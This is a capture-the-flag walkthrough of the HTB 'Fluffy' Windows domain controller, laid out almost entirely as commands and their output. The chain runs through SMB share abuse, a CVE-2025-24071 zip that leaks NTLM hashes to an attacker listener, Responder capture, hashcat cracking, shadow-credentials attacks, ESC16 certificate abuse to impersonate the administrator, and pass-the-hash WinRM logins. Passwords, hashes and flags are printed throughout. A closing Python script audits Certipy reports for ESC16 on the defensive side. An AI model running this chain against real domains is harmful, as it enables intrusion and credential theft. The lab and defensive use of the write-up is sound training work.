Proof of Concept
10.129.68.69
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
Information Gathering
Collecting host information
┌──(kali🎃kali)-[~/Fluffy]
└─$ nxc smb 10.129.68.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --generate-hosts-file hosts
SMB 10.129.68.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.68.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
┌──(kali🎃kali)-[~/Fluffy]
└─$ cat hosts
10.129.68.69 DC01.fluffy.htb DC01
Editing the /etc/hosts file
┌──(kali🎃kali)-[~/Fluffy]
└─$ cat /etc/hosts
<SNIP>
10.129.68.69 DC01.fluffy.htb DC01
BloodHound collection
┌──(kali🎃kali)-[~/Fluffy]
└─$ bloodhound-python -d 'fluffy.htb' -u 'j.fleischman' -p 'J0elTHEM4n1990!' -ns 10.129.68.69 -c All
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Testing resolved hostname connectivity dead:beef::934:b65d:604f:a04f
INFO: Trying LDAP connection to dead:beef::934:b65d:604f:a04f
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Testing resolved hostname connectivity dead:beef::934:b65d:604f:a04f
INFO: Trying LDAP connection to dead:beef::934:b65d:604f:a04f
Auth as P.AGILA
j.fleischman / J0elTHEM4n1990!
Checking SMB shares
- Read/write permission on the IT share
┌──(kali🎃kali)-[~/Fluffy]
└─$ nxc smb 10.129.68.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares
SMB 10.129.68.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.68.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.129.68.69 445 DC01 [*] Enumerated shares
SMB 10.129.68.69 445 DC01 Share Permissions Remark
SMB 10.129.68.69 445 DC01 ----- ----------- ------
SMB 10.129.68.69 445 DC01 ADMIN$ Remote Admin
SMB 10.129.68.69 445 DC01 C$ Default share
SMB 10.129.68.69 445 DC01 IPC$ READ Remote IPC
SMB 10.129.68.69 445 DC01 IT READ,WRITE
SMB 10.129.68.69 445 DC01 NETLOGON READ Logon server share
SMB 10.129.68.69 445 DC01 SYSVOL READ Logon server share
Inspecting the IT directory
- KeePass and a PDF file found
┌──(kali🎃kali)-[~/Fluffy]
└─$ smbclient //DC01.fluffy.htb/IT/ -U 'j.fleischman' --password='J0elTHEM4n1990!'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jan 20 17:05:39 2026
.. D 0 Tue Jan 20 17:05:39 2026
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025
Downloading the PDF file
smb: \> get Upgrade_notice.pdf
getting file \Upgrade_notice.pdf of size 169963 as Upgrade_notice.pdf (77.7 KiloBytes/sec) (average 77.7 KiloBytes/sec)
The PDF lists the CVE numbers the server is currently vulnerable to
- CVE-2025-24996
- CVE-2025-24071
- CVE-2025-46785
- CVE-2025-29968
- CVE-2025-21193
- CVE-2025-3445
An NTLM hash can be spoofed (captured) through CVE-2025-24071
Downloading the CVE-2025-24071 PoC code
┌──(kali🎃kali)-[~/Fluffy]
└─$ git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
Cloning into 'CVE-2025-24071_PoC'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 18 (delta 4), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 6.30 KiB | 6.30 MiB/s, done.
Resolving deltas: 100% (4/4), done.
Running the PoC code to generate exploit.zip
┌──(kali🎃kali)-[~/Fluffy/CVE-2025-24071_PoC]
└─$ python poc.py
Enter your file name: exploit
Enter IP (EX: 192.168.1.162): 10.10.14.81
completed
┌──(kali🎃kali)-[~/Fluffy/CVE-2025-24071_PoC]
└─$ l
exploit.zip poc.py README.md
Uploading the generated exploit.zip to the SMB share
┌──(kali🎃kali)-[~/Fluffy/CVE-2025-24071_PoC]
└─$ smbclient //10.129.232.88/IT -U 'j.fleischman' --password='J0elTHEM4n1990!'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon May 19 10:27:02 2025
.. D 0 Mon May 19 10:27:02 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025
smb: \> put exploit.zip
putting file exploit.zip as \exploit.zip (0.5 kB/s) (average 0.1 kB/s)
Starting the spoofing listener
┌──(kali🎃kali)-[~/Fluffy]
└─$ sudo responder -I tun0
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
After a short wait the NTLM hash is captured
[SMB] NTLMv2-SSP Client : 10.129.232.88
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:bcad1ed6959d4e40:42401EC29E2813CE62F7B144E26DC239:010100000000000080369C201F8ADC01CC7B1E38CD627023000000000200080051004E003200310001001E00570049004E002D0059004F0036003300450054005500430032005600390004003400570049004E002D0059004F003600330045005400550043003200560039002E0051004E00320031002E004C004F00430041004C000300140051004E00320031002E004C004F00430041004C000500140051004E00320031002E004C004F00430041004C000700080080369C201F8ADC010600040002000000080030003000000000000000010000000020000002CC6C1F67AEF262350FEB40FCF2546E885130149865CB4F3881C328EBD9E9E50A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00380031000000000000000000
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[+] Exiting...
Cracking the NTLM hash to obtain the plaintext password
- prometheusx-303
┌──(kali🎃kali)-[~/Fluffy]
└─$ hashcat -m 5600 p.agila.hash /usr/share/wordlists/rockyou.txt --quiet
P.AGILA::FLUFFY:bcad1ed6959d4e40:42401ec29e2813ce62f7b144e26dc239:<SNIP>:prometheusx-303
SMB authentication succeeds as P.AGILA / prometheusx-303
┌──(kali🎃kali)-[~/Fluffy]
└─$ nxc smb 10.129.232.88 -u 'P.AGILA' -p 'prometheusx-303'
SMB 10.129.232.88 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.232.88 445 DC01 [+] fluffy.htb\P.AGILA:prometheusx-303
Auth as winrm_svc
Checked in BloodHound CE:
- The user P.AGILA@FLUFFY.HTB is a member of the group SERVICE ACCOUNT MANAGERS@FLUFFY.HTB.
- The members of this group (SERVICE ACCOUNT MANAGERS@FLUFFY.HTB) have GenericAll permissions to the group SERVICE ACCOUNTS@FLUFFY.HTB.
- The members of the group SERVICE ACCOUNTS@FLUFFY.HTB have generic write access to the user WINRM_SVC@FLUFFY.HTB.
Adding the P.AGILA user to the SERVICE ACCOUNTS group
┌──(kali🎃kali)-[~/Fluffy]
└─$ bloodyAD -d 'fluffy.htb' -u 'P.AGILA' -p 'prometheusx-303' --host 10.129.232.88 add groupMember 'SERVICE ACCOUNTS' p.agila
[+] p.agila added to SERVICE ACCOUNTS
Performing the Shadow Credentials attack
- Obtained the NTLM hash of winrm_svc
- 33bd09dcd697600edf6b3a7af4875767
┌──(kali🎃kali)-[~/Fluffy]
└─$ certipy-ad shadow auto -u 'P.AGILA' -p 'prometheusx-303' -account 'winrm_svc' -dc-ip 10.129.232.88
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '3985becbedb84d9580009a2b6b84f09d'
[*] Adding Key Credential with device ID '3985becbedb84d9580009a2b6b84f09d' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '3985becbedb84d9580009a2b6b84f09d' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
Using the obtained hash, the WinRM login succeeds
┌──(kali🎃kali)-[~/Fluffy]
└─$ evil-winrm -i 10.129.232.88 -u 'winrm_svc' -H '33bd09dcd697600edf6b3a7af4875767'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>
Read user.txt
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> type user.txt
3a25c882372baf60f8e138f701b684bf
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::f22c:7791:984d:297
Link-local IPv6 Address . . . . . : fe80::9218:a844:af34:cff4%11
IPv4 Address. . . . . . . . . . . : 10.129.232.88
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%11
10.129.0.1
Privilege Escalation
Obtaining the NTLM hash of the ca_svc account in the same way
- ca_svc:ca0f4f9e9eb8a092addf53bb03fc98c8
┌──(kali🎃kali)-[~/Fluffy]
└─$ certipy-ad shadow auto -u 'p.agila' -p 'prometheusx-303' -account ca_svc -dc-ip 10.129.232.88
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '293e60af51954a628df0715c992df9ea'
[*] Adding Key Credential with device ID '293e60af51954a628df0715c992df9ea' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '293e60af51954a628df0715c992df9ea' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
Searching for vulnerabilities with Certipy
- Vulnerable to ESC16
┌──(kali🎃kali)-[~/Fluffy]
└─$ certipy-ad find -u 'ca_svc' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -vulnerable -dc-ip 10.129.232.88
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260121170350_Certipy.txt'
[*] Wrote text output to '20260121170350_Certipy.txt'
[*] Saving JSON output to '20260121170350_Certipy.json'
[*] Wrote JSON output to '20260121170350_Certipy.json'
┌──(kali🎃kali)-[~/Fluffy/certipy_find]
└─$ cat 20260121170350_Certipy.txt
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
Read initial UPN of the ca_svc account
┌──(kali🎃kali)-[~/Fluffy/certipy_find]
└─$ certipy-ad account read -u 'ca_svc@fluffy.htb' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip '10.129.232.88' -upn 'administrator' -user 'ca_svc'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
userPrincipalName : ca_svc@fluffy.htb
userAccountControl : 66048
whenCreated : 2025-04-17T16:07:50+00:00
whenChanged : 2026-01-21T21:59:56+00:00
Update the ca_svc account's UPN to the target administrator's sAMAccountName
┌──(kali🎃kali)-[~/Fluffy/certipy_find]
└─$ certipy-ad account update -u 'ca_svc@fluffy.htb' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip '10.129.232.88' -upn 'administrator' -user 'ca_svc'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'
Request a certificate as ca_svc
┌──(kali🎃kali)-[~/Fluffy/certipy_find]
└─$ export KRB5CCNAME=ca_svc.ccache
┌──(kali🎃kali)-[~/Fluffy/certipy_find]
└─$ certipy-ad req -k -dc-ip '10.129.232.88' -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Revert the ca_svc account's UPN
┌──(kali🎃kali)-[~/Fluffy/certipy_find]
└─$ certipy-ad account update -u 'ca_svc@fluffy.htb' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip '10.129.232.88' -upn 'ca_svc@fluffy.htb' -user 'ca_svc'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'
Obtaining the administrator NTLM hash
- 8da83a3fa618b6e3a00e93f676c92a6e
┌──(kali🎃kali)-[~/Fluffy/certipy_find]
└─$ certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb' -dc-ip '10.129.232.88'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
WinRM login as administrator
┌──(kali🎃kali)-[~/Fluffy/certipy_find]
└─$ evil-winrm -i 10.129.232.88 -u 'administrator' -H '8da83a3fa618b6e3a00e93f676c92a6e'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Read root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
099730de0de385d0647f0371a2180cb6
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::f22c:7791:984d:297
Link-local IPv6 Address . . . . . : fe80::9218:a844:af34:cff4%11
IPv4 Address. . . . . . . . . . . : 10.129.232.88
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%11
10.129.0.1
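The ESC16 finding Certipy reported in the find step above ("Security Extension is disabled", i.e. OID 1.3.6.1.4.1.311.25.2 in the CA's Disabled Extensions) is the precondition the whole UPN-swap chain relied on, so a defender auditing saved Certipy reports wants that exact check. The parser below is an added example written for this page, not Certipy's own code; it assumes Certipy's indented "Key : Value" report layout with one numbered entry per CA, and runs over a constructed excerpt mirroring the report shown above.

```python
"""Audit a saved Certipy 'find' text report for the ESC16 precondition.

ESC16 means the CA lists szOID_NTDS_CA_SECURITY_EXT (1.3.6.1.4.1.311.25.2)
under 'Disabled Extensions': issued certificates then carry no SID binding
and the DC maps them by UPN alone. Added example, not Certipy code.
"""
import re
from typing import Dict, List, Optional

SECURITY_EXT_OID = "1.3.6.1.4.1.311.25.2"

# Constructed sample excerpt in Certipy's report layout (not the page's real file).
SAMPLE_REPORT = """Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
Certificate Templates
  0
    Template Name                       : User
"""


def parse_ca_sections(report: str) -> List[Dict[str, str]]:
    """Return one {key: value} dict per numbered CA entry, stopping at the templates section."""
    cas: List[Dict[str, str]] = []
    current: Optional[Dict[str, str]] = None
    for line in report.splitlines():
        if line.startswith("Certificate Templates"):
            break  # template entries are numbered too; do not mistake them for CAs
        if re.fullmatch(r"\s*\d+\s*", line):  # "  0", "  1", ... start a CA entry
            current = {}
            cas.append(current)
        elif current is not None and ":" in line:
            key, _, value = line.partition(":")
            current[key.strip()] = value.strip()
    return cas


def esc16_findings(report: str) -> List[str]:
    """Names of CAs whose disabled-extension list (assumed comma-separated) has the security OID."""
    findings = []
    for ca in parse_ca_sections(report):
        disabled = [o.strip() for o in ca.get("Disabled Extensions", "").split(",")]
        if SECURITY_EXT_OID in disabled:
            findings.append(ca.get("CA Name", "<unknown>"))
    return findings


if __name__ == "__main__":
    for name in esc16_findings(SAMPLE_REPORT):
        print(f"[!] {name}: security extension disabled (ESC16)")
```

Remediation is to re-enable the extension on the CA (clear the DisableExtensionList entry) and move DCs to strong certificate mapping, after which the same parser reports nothing.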